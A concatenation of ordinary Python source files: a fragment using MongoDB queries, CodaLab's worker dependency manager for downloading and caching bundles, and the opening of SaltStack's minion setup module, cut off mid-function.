return self.score_filter.is_full() and (weight < (self.collection.find({ 'top_position': { '$lt': 101 }}).count() / self.collection.find().count()))
def get_ordered_values(self, entry):
keys = list(entry.keys())
keys.sort()
values = []
for k in keys:
values+=[entry[k]]
return values
|
dependency_manager.py
|
from contextlib import closing
from collections import namedtuple
import logging
import os
import threading
import traceback
import time
import shutil
from codalab.lib.formatting import size_str
from codalab.worker.file_util import remove_path, un_tar_directory
from codalab.worker.fsm import BaseDependencyManager, DependencyStage, StateTransitioner
import codalab.worker.pyjson
from codalab.worker.worker_thread import ThreadDict
from codalab.worker.state_committer import JsonStateCommitter
from codalab.worker.bundle_state import DependencyKey
logger = logging.getLogger(__name__)
DependencyState = namedtuple(
'DependencyState', 'stage dependency_key path size_bytes dependents last_used message killed'
)
class DownloadAbortedException(Exception):
"""
Exception raised by the download if a download is killed before it is complete
"""
def __init__(self, message):
super(DownloadAbortedException, self).__init__(message)
class DependencyManager(StateTransitioner, BaseDependencyManager):
"""
This dependency manager downloads dependency bundles from Codalab server
to the local filesystem. It caches all downloaded dependencies but cleans up the
old ones if the disk use hits the given threshold
For this class dependencies are uniquely identified by DependencyKey
"""
DEPENDENCIES_DIR_NAME = 'dependencies'
DEPENDENCY_FAILURE_COOLDOWN = 10
# TODO(bkgoksel): The server writes these to the worker_dependencies table, which stores the dependencies
# json as a SqlAlchemy LargeBinary, which defaults to MySQL BLOB, which has a size limit of
# 65K. For now we limit this value to about 58K to avoid any issues but we probably want to do
# something better (either specify MEDIUMBLOB in the SqlAlchemy definition of the table or change
# the data format of how we store this)
MAX_SERIALIZED_LEN = 60000
def __init__(self, commit_file, bundle_service, worker_dir, max_cache_size_bytes):
super(DependencyManager, self).__init__()
self.add_transition(DependencyStage.DOWNLOADING, self._transition_from_DOWNLOADING)
self.add_terminal(DependencyStage.READY)
self.add_terminal(DependencyStage.FAILED)
self._state_committer = JsonStateCommitter(commit_file)
self._bundle_service = bundle_service
self._max_cache_size_bytes = max_cache_size_bytes
self.dependencies_dir = os.path.join(worker_dir, DependencyManager.DEPENDENCIES_DIR_NAME)
if not os.path.exists(self.dependencies_dir):
logger.info('{} doesn\'t exist, creating.'.format(self.dependencies_dir))
os.makedirs(self.dependencies_dir, 0o770)
# Locks for concurrency
self._dependency_locks = dict() # type: Dict[DependencyKey, threading.RLock]
self._global_lock = threading.RLock() # Used for add/remove actions
self._paths_lock = threading.RLock() # Used for path name computations
# File paths that are currently being used to store dependencies. Used to prevent conflicts
self._paths = set()
# DependencyKey -> DependencyState
self._dependencies = dict()
# DependencyKey -> WorkerThread(thread, success, failure_message)
self._downloading = ThreadDict(fields={'success': False, 'failure_message': None})
self._load_state()
# Sync states between dependency-state.json and dependency directories on the local file system.
self._sync_state()
self._stop = False
self._main_thread = None
def _save_state(self):
with self._global_lock, self._paths_lock:
self._state_committer.commit({'dependencies': self._dependencies, 'paths': self._paths})
def _load_state(self):
"""
Load states from dependencies-state.json, which contains information about bundles (e.g., state, dependencies,
last used, etc.) and populates values for self._dependencies, self._dependency_locks, and self._paths
"""
state = self._state_committer.load(default={'dependencies': {}, 'paths': set()})
dependencies = {}
dependency_locks = {}
for dep, dep_state in state['dependencies'].items():
dependencies[dep] = dep_state
dependency_locks[dep] = threading.RLock()
with self._global_lock, self._paths_lock:
self._dependencies = dependencies
self._dependency_locks = dependency_locks
self._paths = state['paths']
logger.info(
'Loaded {} dependencies, {} paths from cache.'.format(
len(self._dependencies), len(self._paths)
)
)
def _sync_state(self):
"""
Synchronize dependency states between dependencies-state.json and the local file system as follows:
1. self._dependencies, self._dependency_locks, and self._paths: populated from dependencies-state.json
in function _load_state()
2. directories on the local file system: the bundle contents
This function forces the 1 and 2 to be in sync by taking the intersection (e.g., deleting bundles from the
local file system that don't appear in the dependencies-state.json and vice-versa)
"""
# Get the paths that exist in dependency state, loaded path and
# the local file system (the dependency directories under self.dependencies_dir)
local_directories = set(os.listdir(self.dependencies_dir))
paths_in_loaded_state = [dep_state.path for dep_state in self._dependencies.values()]
self._paths = self._paths.intersection(paths_in_loaded_state).intersection(
local_directories
)
# Remove the orphaned dependencies from self._dependencies and
# self._dependency_locks if they don't exist in self._paths (intersection of paths in dependency state,
# loaded paths and the paths on the local file system)
dependencies_to_remove = [
dep
for dep, dep_state in self._dependencies.items()
if dep_state.path not in self._paths
]
for dep in dependencies_to_remove:
logger.info(
"Dependency {} in dependency state but its path {} doesn't exist on the local file system. "
"Removing it from dependency state.".format(
dep, os.path.join(self.dependencies_dir, self._dependencies[dep].path)
)
)
del self._dependencies[dep]
del self._dependency_locks[dep]
# Remove the orphaned directories from the local file system
directories_to_remove = local_directories - self._paths
for dir in directories_to_remove:
full_path = os.path.join(self.dependencies_dir, dir)
logger.info(
"Remove orphaned directory {} from the local file system.".format(full_path)
)
remove_path(full_path)
# Save the current synced state back to the state file: dependency-state.json as
# the current state might have been changed during the state syncing phase
self._save_state()
def start(self):
logger.info('Starting local dependency manager')
def loop(self):
while not self._stop:
try:
self._process_dependencies()
self._save_state()
self._cleanup()
self._save_state()
except Exception:
traceback.print_exc()
time.sleep(1)
self._main_thread = threading.Thread(target=loop, args=[self])
self._main_thread.start()
def stop(self):
logger.info('Stopping local dependency manager')
self._stop = True
self._downloading.stop()
self._main_thread.join()
logger.info('Stopped local dependency manager')
def _process_dependencies(self):
for dep_key, dep_state in self._dependencies.items():
with self._dependency_locks[dep_key]:
self._dependencies[dep_key] = self.transition(dep_state)
def _prune_failed_dependencies(self):
"""
Prune failed dependencies older than DEPENDENCY_FAILURE_COOLDOWN seconds so that further runs
get to retry the download. Without pruning, any future run depending on a
failed dependency would automatically fail indefinitely.
"""
with self._global_lock:
self._acquire_all_locks()
failed_deps = {
dep_key: dep_state
for dep_key, dep_state in self._dependencies.items()
if dep_state.stage == DependencyStage.FAILED
and time.time() - dep_state.last_used
> DependencyManager.DEPENDENCY_FAILURE_COOLDOWN
}
for dep_key, dep_state in failed_deps.items():
self._delete_dependency(dep_key)
self._release_all_locks()
def _cleanup(self):
"""
Prune failed dependencies older than DEPENDENCY_FAILURE_COOLDOWN seconds.
Limit the disk usage of the dependencies (both the bundle files and the serialized state file size)
Deletes oldest failed dependencies first and then oldest finished dependencies.
Doesn't touch downloading dependencies.
"""
self._prune_failed_dependencies()
# With all the locks (should be fast if no cleanup needed, otherwise make sure nothing is corrupted
while True:
with self._global_lock:
self._acquire_all_locks()
bytes_used = sum(dep_state.size_bytes for dep_state in self._dependencies.values())
serialized_length = len(codalab.worker.pyjson.dumps(self._dependencies))
if (
bytes_used > self._max_cache_size_bytes
or serialized_length > DependencyManager.MAX_SERIALIZED_LEN
):
logger.debug(
'%d dependencies in cache, disk usage: %s (max %s), serialized size: %s (max %s)',
len(self._dependencies),
size_str(bytes_used),
size_str(self._max_cache_size_bytes),
size_str(serialized_length),
DependencyManager.MAX_SERIALIZED_LEN,
)
ready_deps = {
dep_key: dep_state
for dep_key, dep_state in self._dependencies.items()
if dep_state.stage == DependencyStage.READY and not dep_state.dependents
}
failed_deps = {
dep_key: dep_state
for dep_key, dep_state in self._dependencies.items()
if dep_state.stage == DependencyStage.FAILED
}
if failed_deps:
dep_key_to_remove = min(
failed_deps.items(), key=lambda dep: dep[1].last_used
)[0]
elif ready_deps:
dep_key_to_remove = min(
ready_deps.items(), key=lambda dep: dep[1].last_used
)[0]
else:
logger.info(
'Dependency quota full but there are only downloading dependencies, not cleaning up until downloads are over'
)
self._release_all_locks()
break
if dep_key_to_remove:
self._delete_dependency(dep_key_to_remove)
self._release_all_locks()
else:
self._release_all_locks()
break
def _delete_dependency(self, dependency_key):
"""
Remove the given dependency from the manager's state
Also delete any known files on the filesystem if any exist
"""
if self._acquire_if_exists(dependency_key):
try:
path_to_remove = self._dependencies[dependency_key].path
self._paths.remove(path_to_remove)
remove_path(path_to_remove)
except Exception:
pass
finally:
del self._dependencies[dependency_key]
self._dependency_locks[dependency_key].release()
def has(self, dependency_key):
"""
Takes a DependencyKey
Returns true if the manager has processed this dependency
"""
with self._global_lock:
return dependency_key in self._dependencies
def get(self, uuid, dependency_key):
"""
Request the dependency for the run with uuid, registering uuid as a dependent of this dependency
"""
now = time.time()
if not self._acquire_if_exists(dependency_key): # add dependency state if it does not exist
with self._global_lock:
self._dependency_locks[dependency_key] = threading.RLock()
self._dependency_locks[dependency_key].acquire()
self._dependencies[dependency_key] = DependencyState(
stage=DependencyStage.DOWNLOADING,
dependency_key=dependency_key,
path=self._assign_path(dependency_key),
size_bytes=0,
dependents=set([uuid]),
last_used=now,
message="Starting download",
killed=False,
)
# update last_used as long as it isn't in FAILED
if self._dependencies[dependency_key].stage != DependencyStage.FAILED:
self._dependencies[dependency_key].dependents.add(uuid)
self._dependencies[dependency_key] = self._dependencies[dependency_key]._replace(
last_used=now
)
self._dependency_locks[dependency_key].release()
return self._dependencies[dependency_key]
def release(self, uuid, dependency_key):
"""
Register that the run with uuid is no longer dependent on this dependency
If no more runs are dependent on this dependency, kill it
"""
if self._acquire_if_exists(dependency_key):
dep_state = self._dependencies[dependency_key]
if uuid in dep_state.dependents:
dep_state.dependents.remove(uuid)
if not dep_state.dependents:
dep_state = dep_state._replace(killed=True)
self._dependencies[dependency_key] = dep_state
self._dependency_locks[dependency_key].release()
def _acquire_if_exists(self, dependency_key):
"""
Safely acquires a lock for the given dependency if it exists
Returns True if depedendency exists, False otherwise
Callers should remember to release the lock
"""
with self._global_lock:
if dependency_key in self._dependencies:
self._dependency_locks[dependency_key].acquire()
return True
else:
return False
def _acquire_all_locks(self):
"""
Acquires all dependency locks in the thread it's called from
"""
with self._global_lock:
for dependency, lock in self._dependency_locks.items():
lock.acquire()
def _release_all_locks(self):
"""
Releases all dependency locks in the thread it's called from
"""
with self._global_lock:
for dependency, lock in self._dependency_locks.items():
lock.release()
def _assign_path(self, dependency_key):
"""
Normalize the path for the dependency by replacing / with _, avoiding conflicts
"""
# TODO(Ashwin): make this not fs-specific.
if dependency_key.parent_path:
path = os.path.join(dependency_key.parent_uuid, dependency_key.parent_path)
else:
path = dependency_key.parent_uuid
path = path.replace(os.path.sep, '_')
# You could have a conflict between, for example a/b_c and
# a_b/c. We have to avoid those.
with self._paths_lock:
while path in self._paths:
path = path + '_'
self._paths.add(path)
return path
def _store_dependency(self, dependency_path, fileobj, target_type):
"""
Copy the dependency fileobj to its path on the local filesystem
Overwrite existing files by the same name if found
(may happen if filesystem modified outside the dependency manager,
for example during an update if the state gets reset but filesystem
doesn't get cleared)
"""
try:
if os.path.exists(dependency_path):
logger.info('Path %s already exists, overwriting', dependency_path)
if os.path.isdir(dependency_path):
shutil.rmtree(dependency_path)
else:
os.remove(dependency_path)
if target_type == 'directory':
un_tar_directory(fileobj, dependency_path, 'gz')
else:
with open(dependency_path, 'wb') as f:
logger.debug('copying file to %s', dependency_path)
shutil.copyfileobj(fileobj, f)
except Exception:
raise
@property
def all_dependencies(self):
with self._global_lock:
return list(self._dependencies.keys())
def _transition_from_DOWNLOADING(self, dependency_state):
def download():
def update_state_and_check_killed(bytes_downloaded):
"""
Callback method for bundle service client updates dependency state and
raises DownloadAbortedException if download is killed by dep. manager
"""
with self._dependency_locks[dependency_state.dependency_key]:
state = self._dependencies[dependency_state.dependency_key]
if state.killed:
raise DownloadAbortedException("Aborted by user")
self._dependencies[dependency_state.dependency_key] = state._replace(
size_bytes=bytes_downloaded,
message="Downloading dependency: %s downloaded"
% size_str(bytes_downloaded),
)
# TODO(Ashwin): make this not fs-specific.
dependency_path = os.path.join(self.dependencies_dir, dependency_state.path)
logger.debug('Downloading dependency %s', dependency_state.dependency_key)
try:
# Start async download to the fileobj
fileobj, target_type = self._bundle_service.get_bundle_contents(
dependency_state.dependency_key.parent_uuid,
dependency_state.dependency_key.parent_path,
)
with closing(fileobj):
# "Bug" the fileobj's read function so that we can keep
# track of the number of bytes downloaded so far.
old_read_method = fileobj.read
bytes_downloaded = [0]
def interruptable_read(*args, **kwargs):
data = old_read_method(*args, **kwargs)
bytes_downloaded[0] += len(data)
update_state_and_check_killed(bytes_downloaded[0])
return data
fileobj.read = interruptable_read
# Start copying the fileobj to filesystem dependency path
self._store_dependency(dependency_path, fileobj, target_type)
logger.debug(
'Finished downloading %s dependency %s to %s',
target_type,
dependency_state.dependency_key,
dependency_path,
)
with self._dependency_locks[dependency_state.dependency_key]:
self._downloading[dependency_state.dependency_key]['success'] = True
except Exception as e:
with self._dependency_locks[dependency_state.dependency_key]:
self._downloading[dependency_state.dependency_key]['success'] = False
self._downloading[dependency_state.dependency_key][
'failure_message'
] = "Dependency download failed: %s " % str(e)
self._downloading.add_if_new(
dependency_state.dependency_key, threading.Thread(target=download, args=[])
)
if self._downloading[dependency_state.dependency_key].is_alive():
return dependency_state
success = self._downloading[dependency_state.dependency_key]['success']
failure_message = self._downloading[dependency_state.dependency_key]['failure_message']
self._downloading.remove(dependency_state.dependency_key)
if success:
return dependency_state._replace(
stage=DependencyStage.READY, message="Download complete"
)
else:
with self._paths_lock:
self._paths.remove(dependency_state.path)
return dependency_state._replace(stage=DependencyStage.FAILED, message=failure_message)
|
minion.py
|
# -*- coding: utf-8 -*-
'''
Routines to set up a minion
'''
# Import python libs
from __future__ import absolute_import, print_function
import os
import re
import sys
import copy
import time
import types
import signal
import fnmatch
import logging
import threading
import traceback
import multiprocessing
from random import shuffle
from stat import S_IMODE
# Import Salt Libs
# pylint: disable=import-error,no-name-in-module,redefined-builtin
import salt.ext.six as six
from salt.ext.six.moves import range
from salt.utils import reinit_crypto
# pylint: enable=no-name-in-module,redefined-builtin
# Import third party libs
try:
import zmq
# TODO: cleanup
import zmq.eventloop.ioloop
# support pyzmq 13.0.x, TODO: remove once we force people to 14.0.x
if not hasattr(zmq.eventloop.ioloop, 'ZMQIOLoop'):
zmq.eventloop.ioloop.ZMQIOLoop = zmq.eventloop.ioloop.IOLoop
HAS_ZMQ = True
except ImportError:
# Running in local, zmq not needed
HAS_ZMQ = False
HAS_RANGE = False
try:
import seco.range
HAS_RANGE = True
except ImportError:
pass
HAS_PSUTIL = False
try:
import salt.utils.psutil_compat as psutil
HAS_PSUTIL = True
except ImportError:
pass
HAS_RESOURCE = False
try:
import resource
HAS_RESOURCE = True
except ImportError:
pass
try:
import zmq.utils.monitor
HAS_ZMQ_MONITOR = True
except ImportError:
HAS_ZMQ_MONITOR = False
# pylint: enable=import-error
# Import salt libs
import salt
import salt.client
import salt.crypt
import salt.loader
import salt.beacons
import salt.payload
import salt.syspaths
import salt.utils
import salt.utils.jid
import salt.pillar
import salt.utils.args
import salt.utils.event
import salt.utils.minions
import salt.utils.schedule
import salt.utils.error
import salt.utils.zeromq
import salt.defaults.exitcodes
from salt.defaults import DEFAULT_TARGET_DELIM
from salt.utils.debug import enable_sigusr1_handler
from salt.utils.event import tagify
from salt.exceptions import (
CommandExecutionError,
CommandNotFoundError,
SaltInvocationError,
SaltReqTimeoutError,
SaltClientError,
SaltSystemExit
)
import tornado.gen # pylint: disable=F0401
import tornado.ioloop # pylint: disable=F0401
log = logging.getLogger(__name__)
# To set up a minion:
# 1. Read in the configuration
# 2. Generate the function mapping dict
# 3. Authenticate with the master
# 4. Store the AES key
# 5. Connect to the publisher
# 6. Handle publications
def resolve_dns(opts):
'''
Resolves the master_ip and master_uri options
'''
ret = {}
check_dns = True
if (opts.get('file_client', 'remote') == 'local' and
not opts.get('use_master_when_local', False)):
check_dns = False
if check_dns is True:
# Because I import salt.log below I need to re-import salt.utils here
import salt.utils
try:
if opts['master'] == '':
raise SaltSystemExit
ret['master_ip'] = \
salt.utils.dns_check(opts['master'], True, opts['ipv6'])
except SaltClientError:
if opts['retry_dns']:
while True:
import salt.log
msg = ('Master hostname: \'{0}\' not found. Retrying in {1} '
'seconds').format(opts['master'], opts['retry_dns'])
if salt.log.is_console_configured():
log.error(msg)
else:
print('WARNING: {0}'.format(msg))
time.sleep(opts['retry_dns'])
try:
ret['master_ip'] = salt.utils.dns_check(
opts['master'], True, opts['ipv6']
)
break
except SaltClientError:
pass
else:
ret['master_ip'] = '127.0.0.1'
except SaltSystemExit:
unknown_str = 'unknown address'
master = opts.get('master', unknown_str)
if master == '':
master = unknown_str
if opts.get('__role') == 'syndic':
err = 'Master address: \'{0}\' could not be resolved. Invalid or unresolveable address. Set \'syndic_master\' value in minion config.'.format(master)
else:
err = 'Master address: \'{0}\' could not be resolved. Invalid or unresolveable address. Set \'master\' value in minion config.'.format(master)
log.error(err)
raise SaltSystemExit(code=42, msg=err)
else:
ret['master_ip'] = '127.0.0.1'
if 'master_ip' in ret and 'master_ip' in opts:
if ret['master_ip'] != opts['master_ip']:
log.warning('Master ip address changed from {0} to {1}'.format(opts['master_ip'],
ret['master_ip'])
)
ret['master_uri'] = 'tcp://{ip}:{port}'.format(ip=ret['master_ip'],
port=opts['master_port'])
return ret
def get_proc_dir(cachedir, **kwargs):
'''
Given the cache directory, return the directory that process data is
stored in, creating it if it doesn't exist.
The following optional Keyword Arguments are handled:
mode: which is anything os.makedir would accept as mode.
uid: the uid to set, if not set, or it is None or -1 no changes are
made. Same applies if the directory is already owned by this
uid. Must be int. Works only on unix/unix like systems.
gid: the gid to set, if not set, or it is None or -1 no changes are
made. Same applies if the directory is already owned by this
gid. Must be int. Works only on unix/unix like systems.
'''
fn_ = os.path.join(cachedir, 'proc')
mode = kwargs.pop('mode', None)
if mode is None:
mode = {}
else:
mode = {'mode': mode}
if not os.path.isdir(fn_):
# proc_dir is not present, create it with mode settings
os.makedirs(fn_, **mode)
d_stat = os.stat(fn_)
# if mode is not an empty dict then we have an explicit
# dir mode. So lets check if mode needs to be changed.
if mode:
mode_part = S_IMODE(d_stat.st_mode)
if mode_part != mode['mode']:
os.chmod(fn_, (d_stat.st_mode ^ mode_part) | mode['mode'])
if hasattr(os, 'chown'):
# only on unix/unix like systems
uid = kwargs.pop('uid', -1)
gid = kwargs.pop('gid', -1)
# if uid and gid are both -1 then go ahead with
# no changes at all
if (d_stat.st_uid != uid or d_stat.st_gid != gid) and \
[i for i in (uid, gid) if i != -1]:
os.chown(fn_, uid, gid)
return fn_
def parse_args_and_kwargs(func, args, data=None):
'''
Wrap load_args_and_kwargs
'''
salt.utils.warn_until(
'Boron',
'salt.minion.parse_args_and_kwargs() has been renamed to '
'salt.minion.load_args_and_kwargs(). Please change this function call '
'before the Boron release of Salt.'
)
return load_args_and_kwargs(func, args, data=data)
def load_args_and_kwargs(func, args, data=None):
'''
Detect the args and kwargs that need to be passed to a function call, and
check them against what was passed.
'''
argspec = salt.utils.args.get_function_argspec(func)
_args = []
_kwargs = {}
invalid_kwargs = []
for arg in args:
if isinstance(arg, six.string_types):
string_arg, string_kwarg = salt.utils.args.parse_input([arg], condition=False) # pylint: disable=W0632
if string_arg:
# Don't append the version that was just derived from parse_cli
# above, that would result in a 2nd call to
# salt.utils.cli.yamlify_arg(), which could mangle the input.
_args.append(arg)
elif string_kwarg:
salt.utils.warn_until(
'Boron',
'The list of function args and kwargs should be parsed '
'by salt.utils.args.parse_input() before calling '
'salt.minion.load_args_and_kwargs().'
)
if argspec.keywords or next(six.iterkeys(string_kwarg)) in argspec.args:
# Function supports **kwargs or is a positional argument to
# the function.
_kwargs.update(string_kwarg)
else:
# **kwargs not in argspec and parsed argument name not in
# list of positional arguments. This keyword argument is
# invalid.
for key, val in six.iteritems(string_kwarg):
invalid_kwargs.append('{0}={1}'.format(key, val))
continue
# if the arg is a dict with __kwarg__ == True, then its a kwarg
elif isinstance(arg, dict) and arg.pop('__kwarg__', False) is True:
for key, val in six.iteritems(arg):
if argspec.keywords or key in argspec.args:
# Function supports **kwargs or is a positional argument to
# the function.
_kwargs[key] = val
else:
# **kwargs not in argspec and parsed argument name not in
# list of positional arguments. This keyword argument is
# invalid.
invalid_kwargs.append('{0}={1}'.format(key, val))
continue
else:
_args.append(arg)
if invalid_kwargs:
raise SaltInvocationError(
'The following keyword arguments are not valid: {0}'
.format(', '.join(invalid_kwargs))
)
if argspec.keywords and isinstance(data, dict):
# this function accepts **kwargs, pack in the publish data
for key, val in six.iteritems(data):
_kwargs['__pub_{0}'.format(key)] = val
return _args, _kwargs
class SMinion(object):
'''
Create an object that has loaded all of the minion module functions,
grains, modules, returners etc. The SMinion allows developers to
generate all of the salt minion functions and present them with these
functions for general use.
'''
def __init__(self, opts):
# Late setup of the opts grains, so we can log from the grains module
opts['grains'] = salt.loader.grains(opts)
self.opts = opts
# Clean out the proc directory (default /var/cache/salt/minion/proc)
if (self.opts.get('file_client', 'remote') == 'remote'
or self.opts.get('use_master_when_local', False)):
if isinstance(self.opts['master'], list):
masters = self.opts['master']
if self.opts['random_master'] is True:
shuffle(masters)
connected_master = False
for master in masters:
self.opts['master'] = master
self.opts.update(resolve_dns(opts))
try:
self.gen_modules()
connected_master = True
break
except SaltClientError:
log.warning(('Attempted to authenticate with master '
'{0} and failed'.format(master)))
continue
# if we are out of masters, lets raise an exception
if not connected_master:
raise SaltClientError('Unable to connect to any master')
else:
if self.opts['random_master'] is True:
log.warning('random_master is True but there is only one master specified. Ignoring.')
self.opts.update(resolve_dns(opts))
self.gen_modules(initial_load=True)
else:
self.gen_modules(initial_load=True)
def gen_modules(self, initial_load=False):
'''
Load all of the modules for the minion
'''
self.opts['pillar'] = salt.pillar.get_pillar(
self.opts,
self.opts['grains'],
self.opts['id'],
self.opts['environment'],
pillarenv=self.opts.get('pillarenv')
).compile_pillar()
self.utils = salt.loader.utils(self.opts)
self.functions = salt.loader.minion_mods(self.opts, utils=self.utils,
include_errors=True)
# TODO: remove
self.function_errors = {} # Keep the funcs clean
self.returners = salt.loader.returners(self.opts, self.functions)
self.states = salt.loader.states(self.opts, self.functions)
self.rend = salt.loader.render(self.opts, self.functions)
self.matcher = Matcher(self.opts, self.functions)
self.functions['sys.reload_modules'] = self.gen_modules
class MinionBase(object):
def __init__(self, opts):
self.opts = opts
@staticmethod
def process_schedule(minion, loop_interval):
try:
minion.schedule.eval()
# Check if scheduler requires lower loop interval than
# the loop_interval setting
if minion.schedule.loop_interval < loop_interval:
loop_interval = minion.schedule.loop_interval
log.debug(
'Overriding loop_interval because of scheduled jobs.'
)
except Exception as exc:
log.error(
'Exception {0} occurred in scheduled job'.format(exc)
)
return loop_interval
def process_beacons(self, functions):
'''
Evaluate all of the configured beacons, grab the config again in case
the pillar or grains changed
'''
if 'config.merge' in functions:
b_conf = functions['config.merge']('beacons')
if b_conf:
return self.beacons.process(b_conf)
return []
class MasterMinion(object):
'''
Create a fully loaded minion function object for generic use on the
master. What makes this class different is that the pillar is
omitted, otherwise everything else is loaded cleanly.
'''
def __init__(
self,
opts,
returners=True,
states=True,
rend=True,
matcher=True,
whitelist=None):
self.opts = salt.config.minion_config(opts['conf_file'])
self.opts.update(opts)
self.whitelist = whitelist
self.opts['grains'] = salt.loader.grains(opts)
self.opts['pillar'] = {}
self.mk_returners = returners
self.mk_states = states
self.mk_rend = rend
self.mk_matcher = matcher
self.gen_modules(initial_load=True)
def gen_modules(self, initial_load=False):
'''
Load all of the modules for the minion
'''
self.utils = salt.loader.utils(self.opts)
self.functions = salt.loader.minion_mods(
self.opts,
utils=self.utils,
whitelist=self.whitelist,
initial_load=initial_load)
if self.mk_returners:
self.returners = salt.loader.returners(self.opts, self.functions)
if self.mk_states:
self.states = salt.loader.states(self.opts, self.functions)
if self.mk_rend:
self.rend = salt.loader.render(self.opts, self.functions)
if self.mk_matcher:
self.matcher = Matcher(self.opts, self.functions)
self.functions['sys.reload_modules'] = self.gen_modules
class MultiMinion(MinionBase):
'''
Create a multi minion interface, this creates as many minions as are
defined in the master option and binds each minion object to a respective
master.
'''
# timeout for one of the minions to auth with a master
MINION_CONNECT_TIMEOUT = 5
def __init__(self, opts):
super(MultiMinion, self).__init__(opts)
self.auth_wait = self.opts['acceptance_wait_time']
self.max_wait = self.opts['acceptance_wait_time_max']
self.io_loop = zmq.eventloop.ioloop.ZMQIOLoop()
def _spawn_minions(self):
'''
Spawn all the coroutines which will sign in to masters
'''
if not isinstance(self.opts['master'], list):
log.error(
'Attempting to start a multimaster system with one master')
sys.exit(salt.defaults.exitcodes.EX_GENERIC)
for master in set(self.opts['master']):
s_opts = copy.deepcopy(self.opts)
s_opts['master'] = master
s_opts['multimaster'] = True
s_opts['auth_timeout'] = self.MINION_CONNECT_TIMEOUT
self.io_loop.spawn_callback(self._connect_minion, s_opts)
@tornado.gen.coroutine
def _connect_minion(self, opts):
'''
Create a minion, and asynchronously connect it to a master
'''
last = 0 # never have we signed in
auth_wait = opts['acceptance_wait_time']
while True:
try:
minion = Minion(opts,
self.MINION_CONNECT_TIMEOUT,
False,
io_loop=self.io_loop,
loaded_base_name='salt.loader.{0}'.format(opts['master']),
)
yield minion.connect_master()
minion.tune_in(start=False)
break
except SaltClientError as exc:
log.error('Error while bringing up minion for multi-master. Is master at {0} responding?'.format(opts['master']))
last = time.time()
if auth_wait < self.max_auth_wait:
auth_wait += self.auth_wait
yield tornado.gen.sleep(auth_wait) # TODO: log?
except Exception as e:
log.critical('Unexpected error while connecting to {0}'.format(opts['master']), exc_info=True)
# Multi Master Tune In
def tune_in(self):
'''
Bind to the masters
This loop will attempt to create connections to masters it hasn't connected
to yet, but once the initial connection is made it is up to ZMQ to do the
reconnect (don't know of an API to get the state here in salt)
'''
# Fire off all the minion coroutines
self.minions = self._spawn_minions()
# serve forever!
self.io_loop.start()
class Minion(MinionBase):
'''
This class instantiates a minion, runs connections for a minion,
and loads all of the functions into the minion
'''
def __init__(self, opts, timeout=60, safe=True, loaded_base_name=None, io_loop=None): # pylint: disable=W0231
'''
Pass in the options dict
'''
# this means that the parent class doesn't know *which* master we connect to
super(Minion, self).__init__(opts)
self.timeout = timeout
self.safe = safe
self._running = None
self.win_proc = []
self.loaded_base_name = loaded_base_name
self.io_loop = io_loop or zmq.eventloop.ioloop.ZMQIOLoop()
if not self.io_loop.initialized():
self.io_loop.install()
# Warn if ZMQ < 3.2
if HAS_ZMQ:
try:
zmq_version_info = zmq.zmq_version_info()
except AttributeError:
# PyZMQ <= 2.1.9 does not have zmq_version_info, fall back to
# using zmq.zmq_version() and build a version info tuple.
zmq_version_info = tuple(
[int(x) for x in zmq.zmq_version().split('.')]
)
if zmq_version_info < (3, 2):
log.warning(
'You have a version of ZMQ less than ZMQ 3.2! There are '
'known connection keep-alive issues with ZMQ < 3.2 which '
'may result in loss of contact with minions. Please '
'upgrade your ZMQ!'
)
# Late setup the of the opts grains, so we can log from the grains
# module
self.opts['grains'] = salt.loader.grains(opts)
# TODO: remove?
def sync_connect_master(self):
'''
Block until we are connected to a master
'''
self._connect_master_future = self.connect_master()
# finish connecting to master
self._connect_master_future.add_done_callback(lambda f: self.io_loop.stop())
self.io_loop.start()
if self._connect_master_future.exception():
raise self._connect_master_future.exception()
@tornado.gen.coroutine
def connect_master(self):
'''
Return a future which will complete when you are connected to a master
'''
master, self.pub_channel = yield self.eval_master(self.opts, self.timeout, self.safe)
yield self._post_master_init(master)
# TODO: better name...
@tornado.gen.coroutine
def _post_master_init(self, master):
'''
Function to finish init after connecting to a master
This is primarily loading modules, pillars, etc. (since they need
to know which master they connected to)
'''
self.opts['master'] = master
self.opts['pillar'] = yield salt.pillar.get_async_pillar(
self.opts,
self.opts['grains'],
self.opts['id'],
self.opts['environment'],
self.opts.get('pillarenv')
).compile_pillar()
self.functions, self.returners, self.function_errors = self._load_modules()
self.serial = salt.payload.Serial(self.opts)
self.mod_opts = self._prep_mod_opts()
self.matcher = Matcher(self.opts, self.functions)
self.beacons = salt.beacons.Beacon(self.opts, self.functions)
uid = salt.utils.get_uid(user=self.opts.get('user', None))
self.proc_dir = get_proc_dir(self.opts['cachedir'], uid=uid)
self.schedule = salt.utils.schedule.Schedule(
self.opts,
self.functions,
self.returners)
# add default scheduling jobs to the minions scheduler
if 'mine.update' in self.functions:
log.info('Added mine.update to scheduler')
self.schedule.add_job({
'__mine_interval':
{
'function': 'mine.update',
'minutes': self.opts['mine_interval'],
'jid_include': True,
'maxrunning': 2
}
})
# add master_alive job if enabled
if self.opts['master_alive_interval'] > 0:
self.schedule.add_job({
'__master_alive':
{
'function': 'status.master',
'seconds': self.opts['master_alive_interval'],
'jid_include': True,
'maxrunning': 1,
'kwargs': {'master': self.opts['master'],
'connected': True}
}
})
self.grains_cache = self.opts['grains']
if 'proxy' in self.opts['pillar']:
log.debug('I am {0} and I need to start some proxies for {1}'.format(self.opts['id'],
self.opts['pillar']['proxy']))
for p in self.opts['pillar']['proxy']:
log.debug('Starting {0} proxy.'.format(p))
pid = os.fork()
if pid > 0:
reinit_crypto()
continue
else:
reinit_crypto()
proxyminion = ProxyMinion(self.opts)
proxyminion.start(self.opts['pillar']['proxy'][p])
self.clean_die(signal.SIGTERM, None)
else:
log.debug('I am {0} and I am not supposed to start any proxies. '
'(Likely not a problem)'.format(self.opts['id']))
@tornado.gen.coroutine
def eval_master(self,
opts,
timeout=60,
safe=True,
failed=False):
'''
Evaluates and returns a tuple of the current master address and the pub_channel.
In standard mode, just creates a pub_channel with the given master address.
With master_type=func evaluates the current master address from the given
module and then creates a pub_channel.
With master_type=failover takes the list of masters and loops through them.
The first one that allows the minion to create a pub_channel is then
returned. If this function is called outside the minions initialization
phase (for example from the minions main event-loop when a master connection
loss was detected), 'failed' should be set to True. The current
(possibly failed) master will then be removed from the list of masters.
'''
# check if master_type was altered from its default
if opts['master_type'] != 'str':
# check for a valid keyword
if opts['master_type'] == 'func':
# split module and function and try loading the module
mod, fun = opts['master'].split('.')
try:
master_mod = salt.loader.raw_mod(opts, mod, fun)
if not master_mod:
raise TypeError
# we take whatever the module returns as master address
opts['master'] = master_mod[mod + '.' + fun]()
except TypeError:
